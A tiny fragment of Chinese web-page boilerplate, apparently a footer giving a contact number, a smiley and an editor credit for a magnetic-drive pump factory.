O21-61557O88 (*^__^*) 嘻嘻……。 (责任编辑:龙亚磁力驱动泵厂) |